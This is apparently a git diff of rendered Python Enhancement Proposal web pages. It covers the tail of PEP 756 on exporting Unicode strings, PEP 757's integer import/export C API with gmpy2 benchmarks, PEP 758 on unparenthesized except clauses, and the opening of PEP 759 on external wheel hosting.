  • PyUnicode_1BYTE_DATA() for PyUnicode_1BYTE_KIND.
  • +
  • PyUnicode_2BYTE_DATA() for PyUnicode_2BYTE_KIND.
  • +
  • PyUnicode_4BYTE_DATA() for PyUnicode_4BYTE_KIND.
  • +
+

To get the best performance, a C extension should have 3 code paths for +each of these 3 string native formats.

+
+
+

Limited C API

+

PEP 393 functions such as PyUnicode_KIND() and +PyUnicode_1BYTE_DATA() are excluded from the limited C API. It’s not +possible to write code specialized for UCS formats. A C extension using +the limited C API can only use less efficient code paths and string +formats.

+

For example, the MarkupSafe project has a C extension +specialized for UCS formats for best performance, and so cannot use the +limited C API.

+
+
+
+

Specification

+
+

API

+

Add the following API to the limited C API version 3.14:

+
int32_t PyUnicode_Export(
+    PyObject *unicode,
+    int32_t requested_formats,
+    Py_buffer *view);
+PyObject* PyUnicode_Import(
+    const void *data,
+    Py_ssize_t nbytes,
+    int32_t format);
+
+#define PyUnicode_FORMAT_UCS1  0x01   // Py_UCS1*
+#define PyUnicode_FORMAT_UCS2  0x02   // Py_UCS2*
+#define PyUnicode_FORMAT_UCS4  0x04   // Py_UCS4*
+#define PyUnicode_FORMAT_UTF8  0x08   // char*
+#define PyUnicode_FORMAT_ASCII 0x10   // char* (ASCII string)
+
+
+

The int32_t type is used instead of int to have a well defined +type size and not depend on the platform or the compiler. +See Avoid C-specific Types for the +longer rationale.

+
+
+

PyUnicode_Export()

+

API:

+
int32_t PyUnicode_Export(
+    PyObject *unicode,
+    int32_t requested_formats,
+    Py_buffer *view)
+
+
+

Export the contents of the unicode string in one of the requested_formats.

+
    +
  • On success, fill view, and return a format (greater than 0).
  • +
  • On error, set an exception, and return -1. +view is left unchanged.
  • +
+

After a successful call to PyUnicode_Export(), +the view buffer must be released by PyBuffer_Release(). +The contents of the buffer are valid until they are released.

+

The buffer is read-only and must not be modified.

+

The view->len member must be used to get the string length. The +buffer should end with a trailing NUL character, but it’s not +recommended to rely on that because of embedded NUL characters.

+

unicode and view must not be NULL.

+

Available formats:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Constant IdentifierValueDescription
PyUnicode_FORMAT_UCS10x01UCS-1 string (Py_UCS1*)
PyUnicode_FORMAT_UCS20x02UCS-2 string (Py_UCS2*)
PyUnicode_FORMAT_UCS40x04UCS-4 string (Py_UCS4*)
PyUnicode_FORMAT_UTF80x08UTF-8 string (char*)
PyUnicode_FORMAT_ASCII0x10ASCII string (Py_UCS1*)
+

UCS-2 and UCS-4 use the native byte order.

+

requested_formats can be a single format or a bitwise combination of the +formats in the table above. +On success, the returned format will be set to a single one of the requested +formats.

+

Note that future versions of Python may introduce additional formats.

+

No memory is copied and no conversion is done.

+
+
+

Export complexity

+

On CPython, an export has a complexity of O(1): no memory is copied +and no conversion is done.

+

To get the best performance on CPython and PyPy, it’s recommended to +support these 4 formats:

+
(PyUnicode_FORMAT_UCS1 \
+ | PyUnicode_FORMAT_UCS2 \
+ | PyUnicode_FORMAT_UCS4 \
+ | PyUnicode_FORMAT_UTF8)
+
+
+

PyPy uses UTF-8 natively and so the PyUnicode_FORMAT_UTF8 format is +recommended. It requires a memory copy, since PyPy str objects can +be moved in memory (PyPy uses a moving garbage collector).

+
+
+

Py_buffer format and item size

+

Py_buffer uses the following format and item size depending on the +export format:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Export formatBuffer formatItem size
PyUnicode_FORMAT_UCS1"B"1 byte
PyUnicode_FORMAT_UCS2"=H"2 bytes
PyUnicode_FORMAT_UCS4"=I"4 bytes
PyUnicode_FORMAT_UTF8"B"1 byte
PyUnicode_FORMAT_ASCII"B"1 byte
+
+
+

PyUnicode_Import()

+

API:

+
PyObject* PyUnicode_Import(
+    const void *data,
+    Py_ssize_t nbytes,
+    int32_t format)
+
+
+

Create a Unicode string object from a buffer in a supported format.

+
    +
  • Return a reference to a new string object on success.
  • +
  • Set an exception and return NULL on error.
  • +
+

data must not be NULL. nbytes must be positive or zero.

+

See PyUnicode_Export() for the available formats.

+
+
+

UTF-8 format

+

CPython 3.14 doesn’t use the UTF-8 format internally and doesn’t support +exporting a string as UTF-8. The PyUnicode_AsUTF8AndSize() function +can be used instead.

+

The PyUnicode_FORMAT_UTF8 format is provided for compatibility with +alternate implementations which may use UTF-8 natively for strings.

+
+
+

ASCII format

+

When the PyUnicode_FORMAT_ASCII format is request for export, the +PyUnicode_FORMAT_UCS1 export format is used for ASCII strings.

+

The PyUnicode_FORMAT_ASCII format is mostly useful for +PyUnicode_Import() to validate that a string only contains ASCII +characters.

+
+
+

Surrogate characters and embedded NUL characters

+

Surrogate characters are allowed: they can be imported and exported.

+

Embedded NUL characters are allowed: they can be imported and exported.

+
+
+
+

Implementation

+

https://github.com/python/cpython/pull/123738

+
+
+

Backwards Compatibility

+

There is no impact on the backward compatibility, only new C API +functions are added.

+
+
+

Usage of PEP 393 C APIs

+

A code search on PyPI top 7,500 projects (in March 2024) shows that +there are many projects importing and exporting UCS formats with the +regular C API.

+
+

PyUnicode_FromKindAndData()

+

25 projects call PyUnicode_FromKindAndData():

+
    +
  • Cython (3.0.9)
  • +
  • Levenshtein (0.25.0)
  • +
  • PyICU (2.12)
  • +
  • PyICU-binary (2.7.4)
  • +
  • PyQt5 (5.15.10)
  • +
  • PyQt6 (6.6.1)
  • +
  • aiocsv (1.3.1)
  • +
  • asyncpg (0.29.0)
  • +
  • biopython (1.83)
  • +
  • catboost (1.2.3)
  • +
  • cffi (1.16.0)
  • +
  • mojimoji (0.0.13)
  • +
  • mwparserfromhell (0.6.6)
  • +
  • numba (0.59.0)
  • +
  • numpy (1.26.4)
  • +
  • orjson (3.9.15)
  • +
  • pemja (0.4.1)
  • +
  • pyahocorasick (2.0.0)
  • +
  • pyjson5 (1.6.6)
  • +
  • rapidfuzz (3.6.2)
  • +
  • regex (2023.12.25)
  • +
  • srsly (2.4.8)
  • +
  • tokenizers (0.15.2)
  • +
  • ujson (5.9.0)
  • +
  • unicodedata2 (15.1.0)
  • +
+
+
+

PyUnicode_4BYTE_DATA()

+

21 projects call PyUnicode_2BYTE_DATA() and/or +PyUnicode_4BYTE_DATA():

+
    +
  • Cython (3.0.9)
  • +
  • MarkupSafe (2.1.5)
  • +
  • Nuitka (2.1.2)
  • +
  • PyICU (2.12)
  • +
  • PyICU-binary (2.7.4)
  • +
  • PyQt5_sip (12.13.0)
  • +
  • PyQt6_sip (13.6.0)
  • +
  • biopython (1.83)
  • +
  • catboost (1.2.3)
  • +
  • cement (3.0.10)
  • +
  • cffi (1.16.0)
  • +
  • duckdb (0.10.0)
  • +
  • mypy (1.9.0)
  • +
  • numpy (1.26.4)
  • +
  • orjson (3.9.15)
  • +
  • pemja (0.4.1)
  • +
  • pyahocorasick (2.0.0)
  • +
  • pyjson5 (1.6.6)
  • +
  • pyobjc-core (10.2)
  • +
  • sip (6.8.3)
  • +
  • wxPython (4.2.1)
  • +
+
+
+
+

Rejected Ideas

+
+

Reject embedded NUL characters and require trailing NUL character

+

In C, it’s convenient to have a trailing NUL character. For example, +the for (; *str != 0; str++) loop can be used to iterate on +characters and strlen() can be used to get a string length.

+

The problem is that a Python str object can embed NUL characters. +Example: "ab\0c". If a string contains an embedded NUL character, +code relying on the NUL character to find the string end truncates the +string. It can lead to bugs, or even security vulnerabilities. +See a previous discussion in the issue Change PyUnicode_AsUTF8() +to return NULL on embedded null characters.

+

Rejecting embedded NUL characters require to scan the string which has +an O(n) complexity.

+
+
+

Reject surrogate characters

+

Surrogate characters are characters in the Unicode range [U+D800; +U+DFFF]. They are disallowed by UTF codecs such as UTF-8. A Python +str object can contain arbitrary lone surrogate characters. Example: +"\uDC80".

+

Rejecting surrogate characters prevents exporting a string which contains +such a character. It can be surprising and annoying since the +PyUnicode_Export() caller doesn’t control the string contents.

+

Allowing surrogate characters allows to export any string and so avoid +this issue. For example, the UTF-8 codec can be used with the +surrogatepass error handler to encode and decode surrogate +characters.

+
+
+

Conversions on demand

+

It would be convenient to convert formats on demand. For example, +convert UCS-1 and UCS-2 to UCS-4 if an export to only UCS-4 is +requested.

+

The problem is that most users expect an export to require no memory +copy and no conversion: an O(1) complexity. It is better to have an +API where all operations have an O(1) complexity.

+
+
+

Export to UTF-8

+

CPython 3.14 has a cache to encode a string to UTF-8. It is tempting to +allow exporting to UTF-8.

+

The problem is that the UTF-8 cache doesn’t support surrogate +characters. An export is expected to provide the whole string content, +including embedded NUL characters and surrogate characters. To export +surrogate characters, a different code path using the surrogatepass +error handler is needed and each export operation has to allocate a +temporary buffer: O(n) complexity.

+

An export is expected to have an O(1) complexity, so the idea to +export UTF-8 in CPython was abadonned.

+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0756.rst

+

Last modified: 2024-10-29 17:09:35 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0757/index.html b/pep-0757/index.html new file mode 100644 index 00000000000..075327a8778 --- /dev/null +++ b/pep-0757/index.html @@ -0,0 +1,710 @@ + + + + + + + + PEP 757 – C API to import-export Python integers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 757 – C API to import-export Python integers

+
+
Author:
+
Sergey B Kirpichev <skirpichev at gmail.com>, +Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2024
+
Python-Version:
+
3.14
+
Post-History:
+
14-Sep-2024
+
Resolution:
+
08-Dec-2024
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at the Export API and the PyLongWriter API.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Add a new C API to import and export Python integers, int objects: +especially PyLongWriter_Create() and PyLong_Export() functions.

+
+
+

Rationale

+

Projects such as gmpy2, SAGE and Python-FLINT access directly Python +“internals” (the PyLongObject structure) or use an inefficient +temporary format (hex strings for Python-FLINT) to import and +export Python int objects. The Python int implementation +changed in Python 3.12 to add a tag and “compact values”.

+

In the 3.13 alpha 1 release, the private undocumented _PyLong_New() +function had been removed, but it is being used by these projects to +import Python integers. The private function has been restored in 3.13 +alpha 2.

+

A public efficient abstraction is needed to interface Python with these +projects without exposing implementation details. It would allow Python +to change its internals without breaking these projects. For example, +implementation for gmpy2 was changed recently for CPython 3.9 and +for CPython 3.12.

+
+
+

Specification

+
+

Layout API

+

Data needed by GMP-like import-export +functions.

+
+
+struct PyLongLayout
+
Layout of an array of “digits” (“limbs” in the GMP terminology), used to +represent absolute value for arbitrary precision integers.

Use PyLong_GetNativeLayout() to get the native layout of Python +int objects, used internally for integers with “big enough” +absolute value.

+

See also sys.int_info which exposes similar information to Python.

+
+
+uint8_t bits_per_digit
+
Bits per digit. For example, a 15 bit digit means that bits 0-14 +contain meaningful information.
+ +
+
+uint8_t digit_size
+
Digit size in bytes. For example, a 15 bit digit will require at least +2 bytes.
+ +
+
+int8_t digits_order
+
Digits order:
    +
  • 1 for most significant digit first
  • +
  • -1 for least significant digit first
  • +
+
+ +
+
+int8_t digit_endianness
+
Digit endianness:
    +
  • 1 for most significant byte first (big endian)
  • +
  • -1 for least significant byte first (little endian)
  • +
+
+ +
+ +
+
+const PyLongLayout *PyLong_GetNativeLayout(void)
+
Get the native layout of Python int objects.

See the PyLongLayout structure.

+

The function must not be called before Python initialization nor after +Python finalization. The returned layout is valid until Python is +finalized. The layout is the same for all Python sub-interpreters and +so it can be cached.

+
+ +
+
+

Export API

+
+
+struct PyLongExport
+
Export of a Python int object.

There are two cases:

+ +
+
+int64_t value
+
The native integer value of the exported int object. +Only valid if digits is NULL.
+ +
+
+uint8_t negative
+
1 if the number is negative, 0 otherwise. +Only valid if digits is not NULL.
+ +
+
+Py_ssize_t ndigits
+
Number of digits in digits array. +Only valid if digits is not NULL.
+ +
+
+const void *digits
+
Read-only array of unsigned digits. Can be NULL.
+ +
+ +

If PyLongExport.digits is not NULL, a private field of the +PyLongExport structure stores a strong reference to the Python +int object to make sure that that structure remains valid until +PyLong_FreeExport() is called.

+
+
+int PyLong_Export(PyObject *obj, PyLongExport *export_long)
+
Export a Python int object.

export_long must point to a PyLongExport structure allocated +by the caller. It must not be NULL.

+

On success, fill in *export_long and return 0. +On error, set an exception and return -1.

+

PyLong_FreeExport() must be called when the export is no longer +needed.

+

CPython implementation detail: This function always succeeds if obj is +a Python int object or a subclass.

+
+ +

On CPython 3.14, no memory copy is needed in PyLong_Export(), it’s just +a thin wrapper to expose Python int internal digits array.

+
+
+void PyLong_FreeExport(PyLongExport *export_long)
+
Release the export export_long created by PyLong_Export().

CPython implementation detail: Calling PyLong_FreeExport() is +optional if export_long->digits is NULL.

+
+ +
+
+

Import API

+

The PyLongWriter API can be used to import an integer.

+
+
+struct PyLongWriter
+
A Python int writer instance.

The instance must be destroyed by PyLongWriter_Finish() or +PyLongWriter_Discard().

+
+ +
+
+PyLongWriter *PyLongWriter_Create(int negative, Py_ssize_t ndigits, void **digits)
+
Create a PyLongWriter.

On success, allocate *digits and return a writer. +On error, set an exception and return NULL.

+

negative is 1 if the number is negative, or 0 otherwise.

+

ndigits is the number of digits in the digits array. It must be +greater than 0.

+

digits must not be NULL.

+

After a successful call to this function, the caller should fill in the +array of digits digits and then call PyLongWriter_Finish() to get +a Python int. +The layout of digits is described by PyLong_GetNativeLayout().

+

Digits must be in the range [0; (1 << bits_per_digit) - 1] +(where the bits_per_digit is the number of bits +per digit). +Any unused most significant digits must be set to 0.

+

Alternately, call PyLongWriter_Discard() to destroy the writer +instance without creating an int object.

+
+ +

On CPython 3.14, the PyLongWriter_Create() implementation is a thin +wrapper to the private _PyLong_New() function.

+
+
+PyObject *PyLongWriter_Finish(PyLongWriter *writer)
+
Finish a PyLongWriter created by PyLongWriter_Create().

On success, return a Python int object. +On error, set an exception and return NULL.

+

The function takes care of normalizing the digits and converts the +object to a compact integer if needed.

+

The writer instance and the digits array are invalid after the call.

+
+ +
+
+void PyLongWriter_Discard(PyLongWriter *writer)
+
Discard a PyLongWriter created by PyLongWriter_Create().

writer must not be NULL.

+

The writer instance and the digits array are invalid after the call.

+
+ +
+
+
+

Optimize import for small integers

+

Proposed import API is efficient for large integers. Compared to +accessing directly Python internals, the proposed import API can have a +significant performance overhead on small integers.

+

For small integers of a few digits (for example, 1 or 2 digits), existing APIs +can be used:

+ +
+
+

Implementation

+ +
+
+

Benchmarks

+

Code:

+
/* Query parameters of Python’s internal representation of integers. */
+const PyLongLayout *layout = PyLong_GetNativeLayout();
+
+size_t int_digit_size = layout->digit_size;
+int int_digits_order = layout->digits_order;
+size_t int_bits_per_digit = layout->bits_per_digit;
+size_t int_nails = int_digit_size*8 - int_bits_per_digit;
+int int_endianness = layout->digit_endianness;
+
+
+
+

Export: PyLong_Export() with gmpy2

+

Code:

+
static int
+mpz_set_PyLong(mpz_t z, PyObject *obj)
+{
+    static PyLongExport long_export;
+
+    if (PyLong_Export(obj, &long_export) < 0) {
+        return -1;
+    }
+
+    if (long_export.digits) {
+        mpz_import(z, long_export.ndigits, int_digits_order, int_digit_size,
+                   int_endianness, int_nails, long_export.digits);
+        if (long_export.negative) {
+            mpz_neg(z, z);
+        }
+        PyLong_FreeExport(&long_export);
+    }
+    else {
+        const int64_t value = long_export.value;
+
+        if (LONG_MIN <= value && value <= LONG_MAX) {
+            mpz_set_si(z, value);
+        }
+        else {
+            mpz_import(z, 1, -1, sizeof(int64_t), 0, 0, &value);
+            if (value < 0) {
+                mpz_t tmp;
+                mpz_init(tmp);
+                mpz_ui_pow_ui(tmp, 2, 64);
+                mpz_sub(z, z, tmp);
+                mpz_clear(tmp);
+            }
+        }
+    }
+    return 0;
+}
+
+
+

Reference code: mpz_set_PyLong() in the gmpy2 master for commit 9177648.

+

Benchmark:

+
import pyperf
+from gmpy2 import mpz
+
+runner = pyperf.Runner()
+runner.bench_func('1<<7', mpz, 1 << 7)
+runner.bench_func('1<<38', mpz, 1 << 38)
+runner.bench_func('1<<300', mpz, 1 << 300)
+runner.bench_func('1<<3000', mpz, 1 << 3000)
+
+
+

Results on Linux Fedora 40 with CPU isolation, Python built in release +mode:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Benchmarkrefpep757
1<<791.3 ns89.9 ns: 1.02x faster
1<<38120 ns94.9 ns: 1.27x faster
1<<300196 ns203 ns: 1.04x slower
1<<3000939 ns945 ns: 1.01x slower
Geometric mean(ref)1.05x faster
+
+
+

Import: PyLongWriter_Create() with gmpy2

+

Code:

+
static PyObject *
+GMPy_PyLong_From_MPZ(MPZ_Object *obj, CTXT_Object *context)
+{
+    if (mpz_fits_slong_p(obj->z)) {
+        return PyLong_FromLong(mpz_get_si(obj->z));
+    }
+
+    size_t size = (mpz_sizeinbase(obj->z, 2) +
+                   int_bits_per_digit - 1) / int_bits_per_digit;
+    void *digits;
+    PyLongWriter *writer = PyLongWriter_Create(mpz_sgn(obj->z) < 0, size,
+                                               &digits);
+    if (writer == NULL) {
+        return NULL;
+    }
+
+    mpz_export(digits, NULL, int_digits_order, int_digit_size,
+               int_endianness, int_nails, obj->z);
+
+    return PyLongWriter_Finish(writer);
+}
+
+
+

Reference code: GMPy_PyLong_From_MPZ() in the gmpy2 master for commit 9177648.

+

Benchmark:

+
import pyperf
+from gmpy2 import mpz
+
+runner = pyperf.Runner()
+runner.bench_func('1<<7', int, mpz(1 << 7))
+runner.bench_func('1<<38', int, mpz(1 << 38))
+runner.bench_func('1<<300', int, mpz(1 << 300))
+runner.bench_func('1<<3000', int, mpz(1 << 3000))
+
+
+

Results on Linux Fedora 40 with CPU isolation, Python built in release +mode:

+ + + + + + + + + + + + + + + + + + + + + +
Benchmarkrefpep757
1<<756.7 ns56.2 ns: 1.01x faster
1<<300191 ns213 ns: 1.12x slower
Geometric mean(ref)1.03x slower
+

Benchmark hidden because not significant (2): 1<<38, 1<<3000.

+
+
+
+

Backwards Compatibility

+

There is no impact on the backward compatibility, only new APIs are +added.

+
+
+

Rejected Ideas

+
+

Support arbitrary layout

+

It would be convenient to support arbitrary layout to import-export +Python integers.

+

For example, it was proposed to add a layout parameter to +PyLongWriter_Create() and a layout member to the +PyLongExport structure.

+

The problem is that it’s more complex to implement and not really +needed. What’s strictly needed is only an API to import-export using the +Python “native” layout.

+

If later there are use cases for arbitrary layouts, new APIs can be +added.

+
+
+

Don’t add PyLong_GetNativeLayout() function

+

Currently, most required information for int import/export is already +available via PyLong_GetInfo() (and sys.int_info). We also +can add more (like order of digits), this interface doesn’t poses any +constraints on future evolution of the PyLongObject.

+

The problem is that the PyLong_GetInfo() returns a Python object, +named tuple, not a convenient C structure and that might distract +people from using it in favor e.g. of current semi-private macros like +PyLong_SHIFT and PyLong_BASE.

+
+
+

Provide mpz_import/export-like API instead

+

The other approach to import/export data from int objects might be +following: expect, that C extensions provide contiguous buffers that CPython +then exports (or imports) the absolute value of an integer.

+

API example:

+
struct PyLongLayout {
+    uint8_t bits_per_digit;
+    uint8_t digit_size;
+    int8_t digits_order;
+};
+
+size_t PyLong_GetDigitsNeeded(PyLongObject *obj, PyLongLayout layout);
+int PyLong_Export(PyLongObject *obj, PyLongLayout layout, void *buffer);
+PyLongObject *PyLong_Import(PyLongLayout layout, void *buffer);
+
+
+

This might work for the GMP, as it has mpz_limbs_read() and +mpz_limbs_write() functions, that can provide required access to +internals of mpz_t. Other libraries may require using temporary +buffers and then mpz_import/export-like functions on their side.

+

The major drawback of this approach is that it’s much more complex on the +CPython side (i.e. actual conversion between different layouts). For example, +implementation of the PyLong_FromNativeBytes() and the +PyLong_AsNativeBytes() (together provided restricted version of the +required API) in the CPython took ~500 LOC (c.f. ~100 LOC in the current +implementation).

+
+
+

Drop value field from the export API

+

With this suggestion, only one export type will exist (array of “digits”). If +such view is not available for a given integer, it will be either emulated by +export functions or the PyLong_Export() will return an error. In both +cases, it’s assumed that users will use other C-API functions to get “small +enough” integers (i.e., that fits to some machine integer types), like the +PyLong_AsLongAndOverflow(). The PyLong_Export() will be +inefficient (or just fail) in this case.

+

An example:

+
static int
+mpz_set_PyLong(mpz_t z, PyObject *obj)
+{
+    int overflow;
+#if SIZEOF_LONG == 8
+    long value = PyLong_AsLongAndOverflow(obj, &overflow);
+#else
+    /* Windows has 32-bit long, so use 64-bit long long instead */
+    long long value = PyLong_AsLongLongAndOverflow(obj, &overflow);
+#endif
+    Py_BUILD_ASSERT(sizeof(value) == sizeof(int64_t));
+
+    if (!overflow) {
+        if (LONG_MIN <= value && value <= LONG_MAX) {
+            mpz_set_si(z, (long)value);
+        }
+        else {
+            mpz_import(z, 1, -1, sizeof(int64_t), 0, 0, &value);
+            if (value < 0) {
+                mpz_t tmp;
+                mpz_init(tmp);
+                mpz_ui_pow_ui(tmp, 2, 64);
+                mpz_sub(z, z, tmp);
+                mpz_clear(tmp);
+            }
+        }
+
+    }
+    else {
+        static PyLongExport long_export;
+
+        if (PyLong_Export(obj, &long_export) < 0) {
+            return -1;
+        }
+        mpz_import(z, long_export.ndigits, int_digits_order, int_digit_size,
+                   int_endianness, int_nails, long_export.digits);
+        if (long_export.negative) {
+            mpz_neg(z, z);
+        }
+        PyLong_FreeExport(&long_export);
+    }
+    return 0;
+}
+
+
+

This might look as a simplification from the API designer point of view, but +will be less convenient for end users. They will have to follow Python +development, benchmark different variants for exporting small integers (is that +obvious why above case was chosen instead of PyLong_AsInt64()?), maybe +support different code paths for various CPython versions or across different +Python implementations.

+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0757.rst

+

Last modified: 2024-12-16 07:23:59 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0758/index.html b/pep-0758/index.html new file mode 100644 index 00000000000..3bd16459767 --- /dev/null +++ b/pep-0758/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 758 – Allow except and except* expressions without parentheses | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 758 – Allow except and except* expressions without parentheses

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
TBD
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
30-Sep-2024
+
Python-Version:
+
3.14
+
Post-History:
+
02-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP [1] proposes to allow unparenthesized except and except* +blocks in Python’s exception handling syntax only when not using the as +clause. Currently, when catching multiple exceptions, parentheses are required +around the exception types. This was a Python 2 remnant. This PEP suggests allowing +the omission of these parentheses, simplifying the syntax, making it more consistent +with other parts of the syntax that make parentheses optional, and improving readability +in certain cases.

+
+
+

Motivation

+

The current syntax for catching multiple exceptions requires parentheses in the +except expression (equivalently for the except* expression). For +example:

+
try:
+    ...
+except (ExceptionA, ExceptionB, ExceptionC):
+    ...
+
+
+

While this syntax is clear and unambiguous, it can be seen as unnecessarily +verbose in some cases, especially when catching a large number of exceptions. By +allowing the omission of parentheses, we can simplify the syntax:

+
try:
+    ...
+except ExceptionA, ExceptionB, ExceptionC:
+    ...
+
+
+

This change would bring the syntax more in line with other comma-separated lists +in Python, such as function arguments, generator expressions inside of a +function call, and tuple literals, where parentheses are optional.

+

The same change would apply to except* expressions. For example:

+
try:
+    ...
+except* ExceptionA, ExceptionB, ExceptionC:
+    ...
+
+
+

When using the as clause to capture the exception instance paretheses must +be used as before. Some users have expressed that they would find it confusing not +to require parentheses as it would be unclear what exactly is being assigned to +the target since in other parts of the language multiple as clauses can be used +in similar situations (like in imports and context managers). This means that if +an as clause its being added to the previous example it must be done as:

+
try:
+    ...
+except (ExceptionA, ExceptionB, ExceptionC) as e:
+    ...
+
+
+
+
+

Rationale

+

The decision to allow unparenthesized except blocks is based on the +following considerations:

+
    +
  1. Simplicity: Removing the requirement for parentheses simplifies the syntax, +making it more consistent with other parts of the language.
  2. +
  3. Readability: In cases where many exceptions are being caught, the removal of +parentheses can improve readability by reducing visual clutter.
  4. +
  5. Consistency: This change makes the except clause more consistent with +other parts of Python where unambiguous, comma-separated lists don’t require +parentheses.
  6. +
+
+
+

Specification

+

The syntax for the except clause will be modified to allow an unparenthesized +list of exception types. The grammar will be updated as follows:

+
except_block:
+    | 'except' expressions ':' block
+    | 'except' expression 'as' NAME ':' block
+    | 'except' ':' block
+
+except_star_block
+    | 'except' '*' expressions ':' block
+    | 'except' '*' expression 'as' NAME ':' block
+
+
+

This allows both the current parenthesized syntax and the new unparenthesized +syntax while requiring parentheses when the as keyword is used:

+
try:
+    ...
+except (ExceptionA, ExceptionB):  # Still valid
+    ...
+except ExceptionC, ExceptionD:    # New syntax
+    ...
+except (ExceptionE, ExceptionF) as e: # Parentheses still required
+    ...
+
+
+

The semantics of exception handling remain unchanged. The interpreter will catch +any of the listed exceptions, regardless of whether they are parenthesized or +not.

+
+
+

Backwards Compatibility

+

This change is fully backwards compatible. All existing code using parenthesized +except and except* blocks will continue to work without modification. +The new syntax is purely additive and does not break any existing code.

+

It’s worth noting that in Python 2 the unparenthesized syntax was allowed with +two elements, but had different semantics, in which the first element of the +list was used as the exception type and the second element as the capture +variable. This change does not reintroduce the Python 2 semantics, and the +unparenthesized syntax will behave identically to the parenthesized version.

+
+
+

Security Implications

+

There are no known security implications for this change. The semantics of +exception handling remain the same, and this is purely a syntactic change.

+
+
+

How to Teach This

+

For new Python users, the unparenthesized syntax can be taught as the standard +way to catch multiple exceptions:

+
try:
+    risky_operation()
+except ValueError, TypeError, OSError:
+    handle_errors()
+
+
+

For experienced users, it can be introduced as a new, optional syntax that can +be used interchangeably with the parenthesized version. Documentation should +note that both forms are equivalent:

+
# These are equivalent:
+except (ValueError, TypeError):
+    ...
+
+except ValueError, TypeError:
+    ...
+
+
+

It should be emphasized that this is purely a syntactic change and does not +affect the behaviour of exception handling.

+
+
+

Reference Implementation

+

A proof-of-concept implementation is available at +https://github.com/pablogsal/cpython/commits/notuples/. This implementation +modifies the Python parser to accept the new syntax and ensures that it behaves +identically to the parenthesized version.

+
+
+

Rejected Ideas

+
    +
  1. Allowing mixed parenthesized and unparenthesized syntax:
    try:
    +    ...
    +except (ValueError, TypeError), OSError:
    +   ...
    +
    +
    +

    This was rejected due to the potential for confusion and to maintain a clear +distinction between the two styles.

    +
  2. +
+
+
+

Deferred Ideas

+
    +
  1. Allowing unparenthesized expressions when the as keyword is used. The reason +we have decided to defer this particular form given that there isn’t clear +consensus either way and there are reasonable arguments for both positions, the safest +approach is keeping the parentheses requirement since it can be removed later if users +find the disconnect too acute, while taking it out and users deciding it was a bad idea +doesn’t make it easy to put back.
  2. +
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0758.rst

+

Last modified: 2024-10-19 19:41:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0759/index.html b/pep-0759/index.html new file mode 100644 index 00000000000..a2a52b5760d --- /dev/null +++ b/pep-0759/index.html @@ -0,0 +1,573 @@ + + + + + + + + PEP 759 – External Wheel Hosting | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 759 – External Wheel Hosting

+
+
Author:
+
Barry Warsaw <barry at python.org>, +Ethan Smith <ethan at ethanhs.me>
+
PEP-Delegate:
+
Donald Stufft <donald at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
01-Oct-2024
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a mechanism by which projects hosted on pypi.org can safely host wheel artifacts on external sites other +than PyPI. This PEP explicitly does not propose external hosting of +projects, packages, or their metadata. That functionality is already available +by externally hosting independent package indexes. Because this PEP only +provides a mechanism for projects to customize the download URL for specific +released wheel artifacts, dependency resolution as already implemented by +common installer tools such as pip and +uv does not need to change.

+

This PEP defines what it means to be “safe” in this context, along with a new +package upload file format called a .rim file. It defines how .rim +files affect the metadata returned for a package’s Simple Repository API +in both HTML and JSON formats, and how traditional wheels can easily be turned +into .rim files.

+
+
+

Rationale

+

The Python Package Index, hosted at https://pypi.org, imposes default limits on upload artifact file size (100 MiB) and total project size +(10 GiB). Most projects can comfortably fit within these limits during the lifetime of the +project, through years of uploads. A few projects have encountered these limits, and have +been granted both file size and project size exceptions, allowing them to continue +uploading new releases without having to take more drastic measures, such as removing +files which may potentially still be in use by consumers (e.g. through version pins).

+

A related workaround is the “wheel stub” +approach, which provides an indirect link between PyPI and an external third party package +index, where such limitations can be avoided. Wheel stubs are source distributions (a.k.a. “sdists”) which utilize a PEP 517 build +backend that, instead of turning source code into a binary wheel, performs some logic to +calculate the URL for an existing, externally hosted wheel to download and install. This +approach works, but it obscures the connection between PyPI, the sdist, and the externally +hosted wheel, since there is no way to present this information to pip or other such +tools.

+
+

Historical context

+

In 2013, PEP 438 proposed a “backward-compatible two-phase transition +process” to modify several aspects of release file hosting on PyPI. As this +PEP describes, PyPI originally supported only project and release +registration without also allowing for artifact file hosting. As such, most +projects hosted release file artifacts elsewhere. Artifact hosting was later +added, but the mix of externally and PyPI-hosted files led to a wide range of +usability and potential security-related problems. PEP 438 was an attempt to +provide several facilities to allow external hosting while promoting a +PyPI-first hosting preference.

+

